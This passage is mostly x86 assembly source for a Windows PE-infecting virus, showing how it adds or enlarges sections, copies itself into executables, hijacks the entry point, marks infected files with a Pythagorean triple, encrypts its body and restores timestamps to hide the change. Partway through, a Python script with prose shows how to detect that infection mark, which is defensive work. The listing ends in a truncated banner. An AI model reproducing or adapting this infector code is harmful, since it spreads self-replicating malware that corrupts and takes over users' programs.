call RestoreCopro ;
add esp, 4 ;
sahf ;load flags with it
jz close_address ;is it already infected?
;
skip_check: ;
cmp [esi.OH_Subsystem], IMAGE_SUBSYSTEM_NATIVE; check if it is not
je close_address ;a driver...
;
mov eax, [esi.OH_AddressOfEntryPoint] ;save entry eip
stosd ;
mov eax, [esi.OH_ImageBase] ;imagebase
stosd ;
mov eax, [esi.OH_SectionAlignment] ;section align
stosd ;
mov eax, [esi.OH_FileAlignment] ;file align
stosd ;
mov eax, [esi.OH_SizeOfImage] ;size of image
stosd ;
mov eax, [esi.OH_SizeOfHeaders] ;headers size
stosd ;
mov eax, [esi.OH_CheckSum] ;and checksum
stosd ;
mov eax, [esi.OH_NumberOfRvaAndSizes] ;save number of dirs..
stosd ;
mov eax, [esi.OH_BaseOfCode] ;and base of code
stosd ;
;
add esi, [ebp+sizeofoptionalheader] ;mov to first sec header
mov ecx, [ebp+numberofsections] ;
;
scan_for_code: ;
mov eax, [esi.SH_VirtualAddress] ;get the RVA
cmp eax, [ebp+baseofcode] ;is it the code section?
jae found_code_section ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next...
loop scan_for_code ;
jmp close_address ;
;
found_code_section: ;
mov [ebp+codesectionheader], esi ;save code section ptr
mov [ebp+codesectionrva], eax ;
mov ebx, [esi.SH_PointerToRawData] ;
mov [ebp+codesectionraw], ebx ;
mov ebx, [esi.SH_VirtualSize] ;
mov eax, [esi.SH_SizeOfRawData] ;
call choose_smaller ;
mov [ebp+codesectionsize], ebx ;
;
;
IF APIHOOK ;
pusha ;
mov esi, [ebp+optionalheader] ;
mov ecx, [ebp+numberofsections] ;
mov ebx, [esi.OH_DataDirectory.DE_Import.DD_VirtualAddress]
or ebx, ebx ;
jz over_import ;
add esi, [ebp+sizeofoptionalheader] ;
;
scan_for_imports: ;
mov eax, [esi.SH_VirtualAddress] ;get the RVA
cmp eax, ebx ;is it the import section?
je found_import ;
jb maybe_found ;
jmp search_next_import ;
;
maybe_found: ;
add eax, [esi.SH_VirtualSize] ;
cmp eax, ebx ;
ja found_import ;
;
search_next_import: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;no... get next...
loop scan_for_imports ;
jmp no_import_found ;
;
found_import: ;enable write on the
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE; imports, credits to
mov [ebp+no_imports], TRUE ;Bumblebee for this.
jmp over_import ;
;
no_import_found: ;
mov [ebp+no_imports], FALSE ;
;
over_import: ;
popa ;
ENDIF ;
call locate_last_section_stuff ;locate stuff in the last
;section
call add_new_section ;add a new section
jnc ok_go_with_it ;
;
call increase_last_section ;
mov edi, [ebp+finaldestination] ;
jmp do_virus_movement ;
;
ok_go_with_it: ;
mov eax, [esi.SH_SizeOfRawData] ;get the 2 sizes and be
cmp eax, virussize ;sure we are smaller than
jb set_method_1 ;both of them...
mov eax, [esi.SH_VirtualSize] ;
cmp eax, virussize ;
jb set_method_1 ;
;
size_is_ok: ;
cmp eax, virussize ;do we fit into the code
jb set_method_1 ;section?
;
mov [ebp+method], METHOD_MOVE_CODE ;if yes, move the code...
;
mov ecx, 5 ;
;
establish_home: ;
mov esi, [ebp+codesectionheader] ;
mov eax, [esi.SH_SizeOfRawData] ;
mov ebx, [esi.SH_VirtualSize] ;
call choose_smaller ;
mov ebx, [esi.SH_PointerToRawData] ;get pointer to data
mov [ebp+codesectionraw], ebx ;save it...
mov esi, ebx ;get a delta difference
IF RANDOMIZE_ENTRY ;
sub eax, virussize ;to place us in and
dec eax ;randomize it...
call brandom32 ;
ELSE ;
mov eax, 1 ;
ENDIF ;
mov [ebp+codedelta], eax ;from where we start?
;
call check_intersection ;are we intersecting with
jnc continue_process ;other directories?
loop establish_home ;if yes, try again!
;
jmp set_method_1 ;if cannot find place move
;at end!
;
continue_process: ;
add esi, eax ;
add esi, [ebp+haddress] ;
push esi ;
mov edi, [ebp+last_section_destination] ;save our destination...
add edi, [ebp+haddress] ;
call [ebp+_IsBadWritePtr], edi, virussize ;can we write?
or eax, eax ;
jnz close_address ;
call move_virus_size ;move the original code
pop edi ;from here...
mov [ebp+finaldestination], edi ;save the destination of
;code
do_virus_movement: ;
cmp [ebp+method], METHOD_INCREASE_LAST ;
jne not_increase_last ;
mov eax, [ebp+last_section_destination] ;
sub eax, [ebp+lastsectionraw] ;
add eax, [ebp+lastsectionrva] ;
jmp set_it ;
;
not_increase_last: ;
cmp [ebp+method], METHOD_APPEND_AT_END ;
jne not_at_end ;
mov eax, [ebp+lastsectionrva] ;
jmp set_it ;
;
not_at_end: ;
mov eax, [ebp+codesectionrva] ;
add eax, [ebp+codedelta] ;
;
set_it: ;
add eax, (ourpoint-start)-1 ;
mov dword ptr [ebp+ourpoint+1], eax ;for imagebase getter
;
mov eax, [ebp+last_section_destination] ;here is a raw ptr in the
sub eax, [ebp+lastsectionraw] ;last section. Subtract
add eax, [ebp+lastsectionrva] ;raw pointer and add virt
mov dword ptr [ebp+codesource], eax ;pointer to get a RVA
mov eax, [ebp+finaldestination] ;same crap on destination
sub eax, [ebp+haddress] ;
sub eax, [ebp+codesectionraw] ;
add eax, [ebp+codesectionrva] ;
mov dword ptr [ebp+codedestin], eax ;
;
mov [ebp+copying], 1 ;synchronization
mov ecx, 100d ;
loop $ ;
;
lea esi, [ebp+start] ;move virus now in the
call move_virus_size ;code place...
mov [ebp+copying], 0 ;
;
mov eax, [ebp+addressofentrypoint] ;save old eip
mov edi, [ebp+finaldestination] ;
mov [edi+offset oldeip-offset start], eax ;
;
mov esi, [ebp+codesectionheader] ;
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ
jmp continue ;make code writable
;
set_method_1: ;
mov [ebp+method], METHOD_APPEND_AT_END ;here we append the virus
;at the end...
mov edi, [ebp+last_section_destination] ;
add edi, [ebp+haddress] ;
mov [ebp+finaldestination], edi ;
call [ebp+_IsBadWritePtr], edi, virussize ;can we write?
or eax, eax ;
jnz close_address ;
jmp do_virus_movement ;
;
continue: ;
call check_not ;check lists
mov eax, [ebp+finaldestination] ;
add eax, (offset firstgen-offset start) ;zero the first gen mark
mov dword ptr [eax], 0 ;
;
mov esi, [ebp+optionalheader] ;now align size of image
mov eax, [ebp+sizeofimage] ;to the section alignment
add eax, [ebp+newsize] ;
cmp eax, [ebp+totalsizes] ;
jb sizeofimage_ok ;
;
call align_to_sectionalign ;
mov [esi.OH_SizeOfImage], eax ;
;
sizeofimage_ok: ;
mov eax, [ebp+filesize] ;align the filesize to
add eax, [ebp+newsize] ;the file alignment
call align_to_filealign ;
mov [ebp+filesize], eax ;
;
cmp [ebp+method], METHOD_APPEND_AT_END ;
je alternate ;
cmp [ebp+method], METHOD_INCREASE_LAST ;
je alternate2 ;
mov eax, [ebp+finaldestination] ;get our final destination
sub eax, [ebp+haddress] ;subtract current map
sub eax, [ebp+codesectionraw] ;
add eax, [ebp+codesectionrva] ;
jmp set_eip ;
;
alternate2: ;
pusha ;
mov esi, [ebp+lastsectionheader] ;
mov eax, [esi.SH_VirtualSize] ;
xchg eax, [esi.SH_SizeOfRawData] ;
mov [esi.SH_VirtualSize], eax ;
popa ;
;
mov eax, [ebp+last_section_destination] ;
sub eax, [ebp+lastsectionraw] ;
add eax, [ebp+lastsectionrva] ;
call EPO_Routine ;
jnc set_epo ;
jmp set_eip ;
;
alternate: ;
mov eax, [ebp+lastsectionrva] ;
call EPO_Routine ;
jnc set_epo ;
jmp set_eip ;
;
set_epo: ;
pusha ;
mov ebx, [ebp+addressofentrypoint] ;
mov edx, ebx ;
add ebx, [ebp+codesectionraw] ;
sub ebx, [ebp+codesectionrva] ;
add ebx, [ebp+haddress] ;
sub eax, edx ;
sub eax, 5 ;
mov edx, dword ptr [ebx] ;
mov ecx, dword ptr [ebx+4] ;
mov byte ptr [ebx], 0e9h ;
mov dword ptr [ebx+1], eax ;
mov eax, [ebp+finaldestination] ;
add eax, (offset saved_code-offset start) ;
mov [eax], edx ;
mov [eax+4], ecx ;
popa ;
jmp mark_infection ;
;
set_eip: ;
mov [esi.OH_AddressOfEntryPoint], eax ;address and save eip RVA
;
mark_infection: ;
mov eax, 100d ;get random Pythagorean
call brandom32 ;triple roots m and n
mov word ptr [ebp+m], ax ;m
mov eax, 100d ;
call brandom32 ;
mov word ptr [ebp+n], ax ;n
;
call InitCopro ;
fild word ptr [ebp+n] ;load the root numbers
fild word ptr [ebp+m] ;
fild word ptr [ebp+n] ;
fild word ptr [ebp+m] ;
fmul st, st(2) ;M*M
fincstp ;
fmul st, st(2) ;N*N
fdecstp ;
fadd st, st(1) ;M*M + N*N
fist word ptr [ebp+a] ;store it to a
fsub st, st(1) ;
fsub st, st(1) ;
fabs ;|M*M - N*N|
fist word ptr [ebp+c] ;store it to c
fincstp ;
fincstp ;
fmul ;
fimul word ptr [ebp+two] ;2*M*N
fist word ptr [ebp+b] ;store it to b
call RestoreCopro ;Now a^2 = b^2 + c^2
add esp, 4 ;
;
push esi ;mark infection!
mov esi, [ebp+haddress] ;
mov ax, [ebp+a] ;
mov word ptr [esi.MZ_oeminfo], ax ;
mov ax, [ebp+b] ;
pop esi ;
mov word ptr [esi.OH_MajorImageVersion], ax ;
mov ax, [ebp+c] ;
mov word ptr [esi.OH_MinorImageVersion], ax ;
;
mov eax, [ebp+sizeofheaders] ;rearrange size of headers
mov [esi.OH_SizeOfHeaders], eax ;
;
mov esi, [ebp+peheader] ;
;
cmp [ebp+method], METHOD_INCREASE_LAST ;
je no_need_to_increase ;
inc word ptr [esi.NumberOfSections] ;
;
no_need_to_increase: ;
IF CHECKSUM ;
mov eax, [esi.OH_CheckSum] ;
or eax, eax ;
jz no_checksum ;
;
mov ebx, [ebp+checksumfile] ;
or ebx, ebx ;
jz no_checksum ;
;
mov esi, [ebp+optionalheader] ;
mov eax, [esi.OH_CheckSum] ;
or eax, eax ;
jz no_checksum ;
lea eax, [esi.OH_CheckSum] ;
push eax ;
lea eax, [ebp+offset headersum] ;
push eax ;
push [ebp+filesize] ;
push [ebp+haddress] ;
call ebx ;
ELSE ;
mov esi, [ebp+optionalheader] ;
xor eax, eax ;
mov [esi.OH_CheckSum], eax ;
ENDIF ;
;
no_checksum: ;
mov esi, [ebp+finaldestination] ;our internal encryptor
add esi, (EncryptedArea - start) ;
mov edi, esi ;
mov ecx, (end2-EncryptedArea) ;
;
EncryptLoop: ;
lodsb ;
mov ebx, ecx ;
inc bl ;
jp _parity ;
rol al, cl ;
jmp do_encrypt ;
;
_parity: ;
ror al, cl ;
;
do_encrypt: ;
stosb ;
loop EncryptLoop ;
;
jmp infection_succesfull ;success!!! ;-)
;
m dw 0 ;
n dw 0 ;
a dw 0 ;
b dw 0 ;
c dw 0 ;
two dw 2 ;
;
move_virus_size: ;this moves as many bytes
mov ecx, virussize ;as the virus size is..
rep movsb ;
ret ;
;
;I found out today a very important thing... Some of the PE files inside
;the Windows directory have a certain particularity that requires special
;care... That is, some of the directories present in the DataDirectory have
;an RVA that falls inside the code section. This is the case for the
;Import Address Table (IAT), which for some files occurs at the beginning of
;the code section. If the virus places itself over that area, then, first of
;all, the running of the original file will be faulted, and second of all, a
;part of the virus will be overwritten by the system at load and an error
;will occur for sure. In this situation the virus will check if any of
;the directories intersects it and if so, will try to get another random
;place. If it is not possible, the virus will go at the end.
check_intersection: ;
pusha ;save registers!
mov edi, esi ;
add edi, eax ;
sub edi, [ebp+codesectionraw] ;
add edi, [ebp+codesectionrva] ;
;
mov esi, [ebp+optionalheader] ;
lea ebx, [esi.OH_DataDirectory] ;
push ecx ;
mov ecx, [ebp+numberofrva] ;how many directories?
mov edx, 0 ;index in directories.
;
check_directories: ;
pusha ;save all again!
mov esi, [ebx.edx.DD_VirtualAddress] ; x = X (esi)
or esi, esi ;
jz ok_next_dir ;
mov eax, esi ; x+y = Y (eax)
add eax, [ebx.edx.DD_Size] ;
;
mov ebx, edi ; a = A (edi)
add ebx, virussize ; a+b = B (ebx)
;
;We have to check if the interval (X,Y) intersects interval (A,B)
;
cmp esi, edi ; X<A?
jbe YYY1 ;
ja XXX1 ;
;
;
YYY1: ;
cmp eax, edi ;Y<A?
jbe ok_next_dir ;
jmp Intersect ;
;
XXX1: ;
cmp esi, ebx ;X>B?
jb Intersect ;
;
ok_next_dir: ;
popa ;
add edx, 8 ;
loop check_directories ;
pop ecx ;
popa ;
clc ;
ret ;
;
Intersect: ;
popa ;
pop ecx ;
popa ;
stc ;
ret ;
;
locate_last_section_stuff: ;
pusha ;
;
mov esi, [ebp+optionalheader] ;
add esi, [ebp+sizeofoptionalheader] ;
mov eax, [ebp+numberofsections] ;get number of sections
;
push eax esi ;first calculate the
mov ecx, eax ;
mov eax, [esi.SH_PointerToRawData] ;
mov [ebp+lowest_section_raw], eax ;lowest pointer to raw
xor edx, edx ;
;
compare_rva: ;
add edx, [esi.SH_VirtualSize] ;
mov eax, [esi.SH_PointerToRawData] ;
cmp [ebp+lowest_section_raw], eax ;
jbe next_compare ;
xchg [ebp+lowest_section_raw], eax ;
;
next_compare: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
loop compare_rva ;
;
; add edx, [ebp+sizeofheaders] ;useless crap...
; mov [ebp+totalsizes], edx ;
;
pop esi eax ;
;
dec eax ;go for last
mov ecx, IMAGE_SIZEOF_SECTION_HEADER ;multiply with the size
xor edx, edx ;of a section
mul ecx ;
add esi, eax ;
mov [ebp+lastsectionheader], esi ;save pointer to header
mov eax, [esi.SH_VirtualAddress] ;
mov [ebp+lastsectionrva], eax ;
mov eax, [esi.SH_PointerToRawData] ;
mov [ebp+lastsectionraw], eax ;
mov eax, [esi.SH_SizeOfRawData] ;choose the smaller of
mov ebx, [esi.SH_VirtualSize] ;the sizes
; Major fix-up!! Many PE files mark in the section header a value which is
; much smaller than the real size of the data. The real value gets calculated
; somehow by the loader, so if we place at the end of one of the sizes we
; will probably overwrite data, so I will simply place it at the end of
; the file, even if this means increasing the infected victim.
;
; if you want to enable the placing in the last section cavity unmark the
; following lines:
;
; call choose_smaller ;
; or eax, eax ;if one is zero, try the
; jnz last_size_ok ;other; if both are 0...
; xchg eax, ebx ;
; or eax, eax ;
; jnz last_size_ok ;
;
consider_eof: ;...consider the EOF as
mov eax, [ebp+filesize] ;the last section dest.
jmp save_it ;
;
last_size_ok: ;if the size is ok, then
mov ebx, [esi.SH_PointerToRawData] ;retrieve the pointer to
or ebx, ebx ;raw data. If it is 0
jz consider_eof ;take eof, otherwise add
add ebx, eax ;it to obtain the pos.
xchg ebx, eax ;
cmp eax, [ebp+filesize] ;if it exceeds the file
ja consider_eof ;size also consider EOF.
;
save_it: ;
mov [ebp+last_section_destination], eax ;save last section pointer
mov eax, [esi.SH_VirtualAddress] ;
mov esi, [ebp+optionalheader] ;
mov ebx, [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
cmp eax, ebx ;
jne not_relocations ;
mov [ebp+situation], RELOCATIONS_LAST ;
jmp done_last ;
;
not_relocations: ;
mov ebx, [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress]
cmp eax, ebx ;
jne no_resources ;
mov [ebp+situation], RESOURCES_LAST ;
jmp done_last ;
;
no_resources: ;
mov [ebp+situation], WE_ARE_LAST ;
;
done_last: ;
popa ;
ret ;
;
add_new_section: ;
pusha ;save all
mov eax, 123h ;choose some random
call brandom32 ;increase
add eax, virussize ;
mov [ebp+newraw], eax ;save new raw
call align_to_filealign ;
mov [ebp+newsize], eax ;save new aligned size
;
mov esi, [ebp+optionalheader] ;
mov ecx, [ebp+numberofrva] ;
add esi, [ebp+sizeofoptionalheader] ;
sub esi, 8 ;
mov eax, 0EEEEEEEEh ;
;
choose_smallest_directory_va: ;
mov ebx, [esi] ;
or ebx, ebx ;
jz go_to_next ;
cmp eax, ebx ;
ja found_smaller_va ;
jmp go_to_next ;
;
found_smaller_va: ;
mov eax, ebx ;
;
go_to_next: ;
sub esi, 8 ;
loop choose_smallest_directory_va ;
;
mov [ebp+smallest_dir_va], eax ;
sub eax, IMAGE_SIZEOF_SECTION_HEADER ;
add eax, [ebp+haddress] ;
;
mov esi, [ebp+lastsectionheader] ;go to last section header
mov ecx, IMAGE_SIZEOF_SECTION_HEADER ;
;
mov ebx, esi ;
add ebx, ecx ;
add ebx, ecx ;
cmp ebx, eax ;
ja its_not_ok ;
;
mov edi, esi ;
add edi, ecx ;
mov eax, edi ;can we insert a new
sub eax, [ebp+haddress] ;section header?
add eax, IMAGE_SIZEOF_SECTION_HEADER ;
cmp eax, [ebp+lowest_section_raw] ;
jb its_ok ;
;
its_not_ok: ;
popa ;
stc ;
ret ;
;
its_ok: ;
rep movsb ;and make a copy of it
;
mov eax, [ebp+sizeofheaders] ;
sub edi, [ebp+haddress] ;
cmp edi, eax ;
jbe ok_header_size ;
add eax, IMAGE_SIZEOF_SECTION_HEADER ;
call align_to_filealign ;
mov [ebp+sizeofheaders], eax ;
;
ok_header_size: ;
cmp [ebp+situation], WE_ARE_LAST ;are we at end?
jne not_last ;
;
mov esi, [ebp+lastsectionheader] ;if yes, then we
mov ebx, [esi.SH_VirtualAddress] ;rearrange the last header
mov eax, [ebp+last_section_destination] ;
sub eax, [esi.SH_PointerToRawData] ;
call align_to_filealign ;
add ebx, eax ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
mov [esi.SH_VirtualAddress], eax ;
call set_our_sizes ;and set our sizes
jmp done_adding ;
;
not_last: ;if we are not last, we
mov eax, [ebp+filesize] ;
sub eax, [esi.SH_PointerToRawData] ;must rearrange both
mov ecx, eax ;headers
mov esi, [esi.SH_PointerToRawData] ;
mov [ebp+last_section_destination], esi ;
add esi, [ebp+haddress] ;
add esi, eax ;
mov edi, esi ;
add edi, [ebp+newsize] ;
std ;
rep movsb ;and move the last section
cld ;below our new section
mov esi, [ebp+lastsectionheader] ;
call set_our_sizes ;
mov ebx, [esi.SH_VirtualAddress] ;
add ebx, [esi.SH_SizeOfRawData] ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
mov eax, [ebp+newsize] ;
add [esi.SH_PointerToRawData], eax ;
mov eax, ebx ;
call align_to_sectionalign ;
mov [esi.SH_VirtualAddress], eax ;
mov esi, [ebp+optionalheader] ;
;
cmp [ebp+situation], RESOURCES_LAST ;check if we must fix
jne then_relocs ;resources
;
mov [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress], ebx
call RealignResources ;
jmp done_adding ;
;
then_relocs: ;
mov [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress], ebx
call RealignRelocs ;
jmp done_adding ;
;
set_our_sizes: ;
call set_our_name ;
mov eax, [ebp+newraw] ;set our new raw size
mov [esi.SH_VirtualSize], eax ;and our virtual size
call align_to_filealign ;
mov [esi.SH_SizeOfRawData], eax ;
mov [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ+\
IMAGE_SCN_CNT_INITIALIZED_DATA
ret ;
;
done_adding: ;
popa ;
clc ;
ret ;
;
set_our_name: ;
pusha ;
push esi ;
mov esi, [ebp+optionalheader] ;
add esi, [ebp+sizeofoptionalheader] ;
mov ecx, [ebp+numberofsections] ;
mov ebx, section_names_number ;
;
compare_names: ;
push ecx ;
lea edi, [ebp+section_names] ;
mov ecx, section_names_number ;
;
compare: ;
inc edi ;
push ecx esi edi ;
mov ecx, 8 ;
rep cmpsb ;
je mark_it ;
;
next_name: ;
pop edi esi ecx ;
add edi, 8 ;
loop compare ;
jmp next_section ;
;
mark_it: ;
mov byte ptr [edi-9], 0 ;
dec ebx ;
pop edi esi ecx ;
jmp next_section ;
;
next_section: ;
add esi, IMAGE_SIZEOF_SECTION_HEADER ;
pop ecx ;
loop compare_names ;
;
or ebx, ebx ;
jz choose_safe ;
mov eax, ebx ;
call brandom32 ;
lea edi, [ebp+section_names] ;
sub edi, 9 ;
mov ecx, eax ;
or ecx, ecx ;
jnz choose_name ;
add edi, 9 ;
jmp done_choosing ;
;
choose_name: ;
add edi, 9 ;
cmp byte ptr [edi], 1 ;
je looping ;
inc ecx ;don't count it
;
looping: ;
loop choose_name ;
;
done_choosing: ;
inc edi ;
pop esi ;
xchg esi, edi ;
mov ecx, 8 ;
rep movsb ;
popa ;
ret ;
;
choose_safe: ;
lea edi, [ebp+safe] ;
jmp done_choosing ;
;
section_names: ;our new section not so
db 1, "DATA" , 0, 0, 0, 0 ;random name...
db 1, ".data" , 0, 0, 0 ;
db 1, ".idata", 0, 0 ;
db 1, ".udata", 0, 0 ;
db 1, "BSS" , 0, 0, 0, 0, 0 ;
db 1, ".rdata", 0, 0 ;
db 1, ".sdata", 0, 0 ;
db 1, ".edata", 0, 0 ;
section_names_number = ($-offset section_names)/9 ;
safe db 0,0,0,0,0,0,0,0 ;
;
increase_last_section: ;
mov [ebp+method], METHOD_INCREASE_LAST ;
mov esi, [ebp+lastsectionheader] ;
mov eax, [ebp+newraw] ;
add [esi.SH_SizeOfRawData], eax ;
mov eax, [ebp+newsize] ;
add [esi.SH_VirtualSize], eax ;
mov eax, [ebp+last_section_destination] ;
add eax, [ebp+haddress] ;
mov [ebp+finaldestination], eax ;
or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ
ret ;
;
CalculateDelta:
mov esi, [ebp+lastsectionheader] ;go to last section
mov eax, [esi.SH_VirtualAddress] ;and calculate the
add esi, IMAGE_SIZEOF_SECTION_HEADER ;RVA delta
sub eax, [esi.SH_VirtualAddress] ;
neg eax ;
ret ;
;
RealignResources: ;
call CalculateDelta ;
mov [ebp+DeltaRVA], eax ;
mov esi, dword ptr [esi.SH_PointerToRawData]; Point the resources
add esi, dword ptr [ebp+haddress] ; and align in memo
mov edi, esi ; save in edi
add edi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir
call parse_resource_directory ; parse all
ret ;
;
parse_resource_directory: ;
xor ecx, ecx ;
mov cx, word ptr [esi.RD_NumberOfNamedEntries]; NamedEntries+IdEntries
add cx, word ptr [esi.RD_NumberOfIdEntries] ; is our counter
;
add esi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir
;
parse_this_one: ;
push ecx ; save counter
push esi ; save address
call parse_resource ; parse the dir
pop esi ; restore address
pop ecx ; restore counter
add esi, 8 ; get next entry
loop parse_this_one ; loop until cx=0
ret ; return
;
parse_resource: ;
mov eax, [esi.RDE_OffsetToData] ; get offset to data
mov esi, edi ; get base of resources
test eax, 80000000h ; is it a subdirectory?
jz data_is_resource ;
;
data_is_directory: ;
xor eax, 80000000h ; if it is a subdirectory
add esi, eax ; find its address and
sub esi, 10h ;
call parse_resource_directory ; go to parse it too...
ret ;
;
data_is_resource: ; if it is data, then
add esi, eax ; find out its address
sub esi, 10h ;
mov eax, dword ptr [ebp+DeltaRVA] ; and increment the offs
add dword ptr [esi.REDE_OffsetToData], eax ; to data with our Delta
ret ; and ret...
;
RealignRelocs: ;
ret ;
;
infection_succesfull: ;
mov [ebp+flag], 0 ;mark good infection
;
close_address: ;
call [ebp+_UnmapViewOfFile], [ebp+haddress] ;unmap view
;
close_map: ;
call [ebp+_CloseHandle], [ebp+hmap] ;close map object
;
close_file: ;
call [ebp+_SetFilePointer], [ebp+hfile], [ebp+filesize], 0, FILE_BEGIN
call [ebp+_SetEndOfFile], [ebp+hfile] ;set EOF
lea ebx, [ebp+filetime1] ;restore the file time
push ebx ;
add ebx, 8 ;
push ebx ;
add ebx, 8 ;
push ebx ;
push [ebp+hfile] ;
call [ebp+_SetFileTime] ;restore file time
call [ebp+_CloseHandle], [ebp+hfile] ;close file
;
finished: ;
call [ebp+_SetFileAttributesA], [ebp+filename], [ebp+fileattributes]
cmp [ebp+flag], 0 ;restore attributes
je succesfull_infection ;
;
failed_infection: ;
mov [ebp+fileopen], FALSE ;
popa ;
stc ;
ret ;
;
succesfull_infection: ;
mov [ebp+fileopen], FALSE ;
popa ;
clc ;
ret ;
;
choose_smaller: ;
cmp eax, ebx ;
ja get_ebx ;
ret ;
;
get_ebx: ;
xchg eax, ebx ;
ret ;
;
align_to_filealign: ;here are the aligning
mov ecx, [ebp+filealign] ;procedures
jmp align_eax ;
;
align_to_sectionalign: ;
mov ecx, [ebp+sectionalign] ;
;
align_eax: ;
push edx ;
xor edx, edx ;
div ecx ;
or edx, edx ;
jz $+3 ;
inc eax ;
mul ecx ;
pop edx ;
ret ;
;
InfectFile endp ;
;
fileattributes dd 0 ;
filesize dd 0 ;
filetime1 dq 0 ;
filetime2 dq 0 ;
filetime3 dq 0 ;
hfile dd 0 ;
hmap dd 0 ;
haddress dd 0 ;
flag dd 0 ;
additional dd 0 ;
peheader dd 0 ;
lastsectionheader dd 0 ;
last_section_destination dd 0 ;
codesectionraw dd 0 ;
codesectionheader dd 0 ;
finaldestination dd 0 ;
method dd 0 ;
pedata label ;
numberofsections dd 0 ; stored as dword!!
sizeofoptionalheader dd 0 ; stored as dword!!
addressofentrypoint dd 0 ;
_imagebase dd 0 ;
sectionalign dd 0 ;
filealign dd 0 ;
sizeofimage dd 0 ;
sizeofheaders dd 0 ;
checksum dd 0 ;
numberofrva dd 0 ;
baseofcode dd 0 ;
codesection dd 0 ;
codesectionsize dd 0 ;
lastsection dd 0 ;
lastsectionsize dd 0 ;
increasement dd 0 ;
codedelta dd 0 ;
optionalheader dd 0 ;
filename dd 0 ;
copying db 0 ;
lastsectionraw dd 0 ;
lastsectionrva dd 0 ;
codesectionrva dd 0 ;
codesource dd 0 ;
codedestin dd 0 ;
PayloadThreadID dd 0 ;
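The infection mark used by InfectFile above is a Pythagorean triple: mark_infection stores a = m*m + n*n in the MZ header's e_oeminfo (MZ_oeminfo), b = 2*m*n in OH_MajorImageVersion and c = |m*m - n*n| in OH_MinorImageVersion, and a file is treated as already infected when both version words are non-zero and b^2 + c^2 - a^2 == 0. The Python script below is an added scanner-side example, not part of the original listing or of the virus: it reads those three words from a PE image and applies the same test, so a file carrying the mark can be flagged without running it. The make_pe helper builds a constructed minimal PE32 header purely as sample input; the field offsets are those of IMAGE_DOS_HEADER and IMAGE_OPTIONAL_HEADER32, and the 0x1000 bound on e_lfanew mirrors the check the infector itself performs.

```python
import struct

# IMAGE_DOS_HEADER / IMAGE_OPTIONAL_HEADER32 field offsets used by the check
DOS_E_OEMINFO = 0x26            # word: the infector's "a"
DOS_E_LFANEW = 0x3C             # dword: file offset of "PE\0\0"
FILE_HEADER_SIZE = 20           # sizeof IMAGE_FILE_HEADER
OPT_MAJOR_IMAGE_VERSION = 44    # word inside the optional header: "b"
OPT_MINOR_IMAGE_VERSION = 46    # word inside the optional header: "c"
MAX_LFANEW = 0x1000             # the infector rejects headers further in than this


def read_marker_words(pe: bytes):
    """Return (a, b, c) as signed words, matching the 'fild word ptr' loads
    in the listing, or None when the fields cannot be located in the buffer."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    lfanew = struct.unpack_from("<I", pe, DOS_E_LFANEW)[0]
    if lfanew > MAX_LFANEW:
        return None
    opt = lfanew + 4 + FILE_HEADER_SIZE        # optional header follows "PE\0\0"
    if opt + OPT_MINOR_IMAGE_VERSION + 2 > len(pe):
        return None
    if pe[lfanew:lfanew + 4] != b"PE\0\0":
        return None
    a = struct.unpack_from("<h", pe, DOS_E_OEMINFO)[0]
    b = struct.unpack_from("<h", pe, opt + OPT_MAJOR_IMAGE_VERSION)[0]
    c = struct.unpack_from("<h", pe, opt + OPT_MINOR_IMAGE_VERSION)[0]
    return a, b, c


def has_pythagorean_mark(pe: bytes) -> bool:
    """True when the header words satisfy the infector's own 'already
    infected' test: both version words non-zero and b^2 + c^2 == a^2."""
    words = read_marker_words(pe)
    if words is None:
        return False
    a, b, c = words
    if b == 0 or c == 0:          # the listing jumps to skip_check here
        return False
    return b * b + c * c == a * a


def mark_from_seeds(m: int, n: int):
    """The triple mark_infection derives from its two random seeds in
    [0, 100): a = m*m + n*n, b = 2*m*n, c = |m*m - n*n|."""
    return m * m + n * n, 2 * m * n, abs(m * m - n * n)


def make_pe(oeminfo: int, major: int, minor: int) -> bytes:
    """Constructed minimal PE32 header image (no sections, not loadable),
    used only as sample input for the detector."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<h", dos, DOS_E_OEMINFO, oeminfo)
    struct.pack_into("<I", dos, DOS_E_LFANEW, 0x40)
    # Machine=i386, 1 section, SizeOfOptionalHeader=224,
    # Characteristics=EXECUTABLE_IMAGE|32BIT_MACHINE
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<hh", opt, OPT_MAJOR_IMAGE_VERSION, major, minor)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(opt)


if __name__ == "__main__":
    a, b, c = mark_from_seeds(3, 2)                       # (13, 12, 5)
    samples = (("marked", make_pe(a, b, c)),
               ("clean, version 1.0", make_pe(0, 1, 0)),
               ("clean, version 3.4", make_pe(0, 3, 4)))
    for label, image in samples:
        print(f"{label}: {has_pythagorean_mark(image)}")
```

The test is a heuristic with the same ambiguity the infector accepts: a clean file whose ImageVersion words and e_oeminfo happen to satisfy the identity would match too. In practice e_oeminfo is usually zero in linker-produced files, so a non-zero value there is already worth a closer look, and a triple that also fits mark_from_seeds with both seeds below 100 is a strong signal.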
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;³ ÜÜÜ ÜÜÜ Ü Ü Ü ÜÜÜ ÜÜÜ ÜÜ ;
